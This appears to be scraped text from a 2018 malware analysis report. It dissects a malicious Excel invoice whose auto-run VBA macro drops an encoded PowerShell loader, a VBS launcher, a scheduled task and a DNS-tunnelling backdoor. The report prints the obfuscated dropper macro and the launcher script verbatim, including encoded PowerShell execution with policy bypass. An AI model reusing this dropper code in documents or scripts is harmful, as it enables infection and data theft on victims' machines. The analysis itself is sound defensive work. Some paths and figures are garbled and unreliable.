Malicious File T1546,013 Event Triggered Execution: PowerShell Profile T1053,005 Scheduled Task/Job: Scheduled Task T1059,005 Command and Scripting Interpreter: Visual Basic T1071,004 Application Layer Protocol: DNS
  • 5. ANNUAL REPORT | 2018 5 VBA MACRO ANALYSIS In the event a victim opens the malicious Microsoft Excel spreadsheet attached within the email, This Excel file contains a single spreadsheet, and the spreadsheet contains invoice data. As soon as user click on "Enable content" allowing execution of the first stage of the malware payload. Figure 1 Malicious Excel spreadsheet Let us use the popular oledump and olevba Python scripts, to examine whether the XLS file contains any VBA macros:
  • 6. ANNUAL REPORT | 2018 6 Let us use the popular olevba Python scripts, to examine whether the XLS file contains any VBA macros: Figure 2 Malicious Excel spreadsheet According to olevba tool, the Excel sheet contain VBA macros. VBA code: Observed the below function that refers to data in the cells. Private Sub Workbook_Open() Call F5615664 End Sub Sub F5615664() On Error Resume Next A4660720 = "wS" & "cri" & "pt." & "Sh" & "ell" I6611623 = "Sc" & "ript" & "ing." & "File" & "Sy" & "stemOb" & "ject" Set U5777083 = CreateObject(A4660720) Set D6945409 = CreateObject(I6611623) W2151843 = U5777083.ExpandEnvironmentStrings("%temp%U1848931.TMP") I2622608 = ActiveWorkbook.Worksheets(1).Cells(37, 27) Set M9383463 = D6945409.OpenTextFile(W2151843, 2, True) M9383463.WriteLine (I2622608) M9383463.Close U1808667 = ActiveWorkbook.Worksheets(1).Cells(40, 27) K7517347 = "cmd" & ".e" & "xe -e" & "xec b" & "ypas" & "s -E" & "nc " V1380609 = K7517347 & U1808667 U5777083.Run V1380609, 0 ActiveWorkbook.Worksheets(2).Visible = True ActiveWorkbook.Worksheets(3).Visible = True ActiveWorkbook.Worksheets(2).Activate ActiveWorkbook.Worksheets(1).Visible = False ActiveWorkbook.Save End Sub
  • 7. ANNUAL REPORT | 2018 7 We did not observe any data initially. we pull the extracted Workbook stream into our hex editor Using Windows GUI tool for Structure Storage View SSView. Figure 3 SSView We pull the extracted Workbook stream into our hex editor and reviewed further and observed that there was some obfuscated data, and it was encoded as base64 encode (obfuscation technique) not visible intially. Figure 3 encode base64
  • 8. ANNUAL REPORT | 2018 8 Find below the De-obfuscated data: (PowerShell script malware) Now decided to debug the Sub function F5615664 using Visual Basic Editor as it was used in the call. We able to get the de-obfuscated data from first two parameters in code A4660720 = "wS" & "cri" & "pt." & "Sh" & "ell" I6611623 = "Sc" & "ript" & "ing." & "File" & "Sy" & "stemOb" & "ject" Result: A4660720 = wScript.Shell I6611623 = "Scripting.FileSystemObject" Observed the below function that refers to data in the cells. W2151843 = U5777083.ExpandEnvironmentStrings("%temp%U1848931.TMP") I2622608 = ActiveWorkbook.Worksheets(1).Cells(37, 27) Set M9383463 = D6945409.OpenTextFile(W2151843, 2, True) M9383463.WriteLine (I2622608) M9383463.Close We found hidden data in these cells as we shown in Figure 3. This data is encoded in base64 and the VBA macro will drop this data info file in “%temp%U1848931.TMP” as shown in below code: W2151843 = U5777083.ExpandEnvironmentStrings("%temp%U1848931.TMP") I2622608 = ActiveWorkbook.Worksheets(1).Cells(37, 27) Set M9383463 = D6945409.OpenTextFile(W2151843, 2, True) M9383463.WriteLine (I2622608) M9383463.Close Then next function will call some data from cells then execute this code U1808667 = ActiveWorkbook.Worksheets(1).Cells(40, 27) K7517347 = "cmd" & ".e" & "xe -e" & "xec b" & "ypas" & "s -E" & "nc " V1380609 = K7517347 & U1808667
  • 9. ANNUAL REPORT | 2018 9 U5777083.Run V1380609, 0 the de-obfuscated result: U1808667 = ActiveWorkbook.Worksheets(1).Cells(40, 27) K7517347 = "cmd.exe -exec bypass -Enc " V1380609 = K7517347 & U1808667 U5777083.Run V1380609, 0 I am using simple function to dump missing data from hidden cells in below: Sub Print_p1_file() Dim strFile_Path As String strFile_Path = "C:UsersUserDesktop p1.txt" Open strFile_Path For Output As #1 I2622638 = ActiveWorkbook.Worksheets(1).Cells(37, 27) Write #1, I2622638 Close #1 End Sub Sub Print_p2_file() Dim strFile_Path As String strFile_Path = "C:UsersUserDesktop p2.txt" Open strFile_Path For Output As #1 U1808667 = ActiveWorkbook.Worksheets(1).Cells(40, 27) Write #1, U1808667 Close #1 End Sub Result: Result: Now let us decode the code and start Malware Analysis.
  • 10. ANNUAL REPORT | 2018 10 5 POWERSHELL MALWARE DEEP DIVE the malicious document creates a PowerShell and VBS file and then continues executing the payload by using the following command line parameters. • Malware before profile id path: C:UsersUserAppDataLocalTempU1848931.TMP • malware path: C:UsersUserAppDataLocalMicrosoftWindowsmc.ps1 • VBS path: C:UsersUserAppDataLocalMicrosoftWindowsL69742.vbs • Command Line; please note that the string executes through vbs script: powershell.exe -NoP -sta -NonI -exec bypass -file C:UsersUserappdatalocalmicrosoftWindowsmc.ps1 Figure 4: Infection procedure As soon as the macro executes and launches PowerShell, the malware is dropped and proceeds to a multistage deployment procedure. 1 - PowerShell loader: Create machine id and decode malware file 2: VBS script: Execute malware 3: MC PowerShell malware offers functionality to control infected victims.
  • 11. ANNUAL REPORT | 2018 11 Let us start analysis PowerShell loader, as we see in below first function responsibility to create a VBS script VBS data after decoding: set wss = CreateObject("WScript.Shell") str = "power" & "sh" & "ell" & ".e" & "xe -NoP -sta -NonI -e" & "xe" & "c byp" & "as" & "s -fi" & "le " path = "#dpath#" str = str + path + "mc.ps1" wss.Run str, 0 Second function, decoding malware code and create machine Id and replaced in the second- stage “ mc.ps1”
  • 12. ANNUAL REPORT | 2018 12 last function, Responsible for creating scheduled task named “GoogleServiceUpdate” to execute VBS script named “L69742.vbs” every 2 minutes. Let us start analysis PowerShell Malware, MC.ps1 PowerShell malware offers functionality to control infected victims. 1: Create PATH and Folders 2: Reads the HDD data 3: Download and implant additional tools and malware through DNS requests 4: DNS Data exfiltration As we see in below image, The first multiple lines are parameters values, include (script path, download folder, upload folder, machine id, max host length, C2 server) As below image the function is responsible to terminate the PowerShell if the number of execution orders exceeds 4
  • 13. ANNUAL REPORT | 2018 13 The below function "base32data", which i highlighted are responsible for encoded and decoded before and after communicating with the C2. Now, the below function responsible to create folders “dn” folder and “up” folder. The below function responsible for communicating with the C2 and download file through DNS request using windows “NSLookup.exe” file.
  • 14. ANNUAL REPORT | 2018 14 let's go deep dive with this function, in first step the DNS request will start with “script will replace “ ([string]$id)” to machine id “40699” then add data Randomly to the DNS request then send the request to C2. If the C2 response back with OK, then the script will continue with the batch file download function. But C2 response back with NO, then the script will continue to the upload file function. as shown in the image below. The C2 will continue to send and receive data through DNS request until the request contains "EOFEOF" which mean the File completed.
  • 15. ANNUAL REPORT | 2018 15 Thank you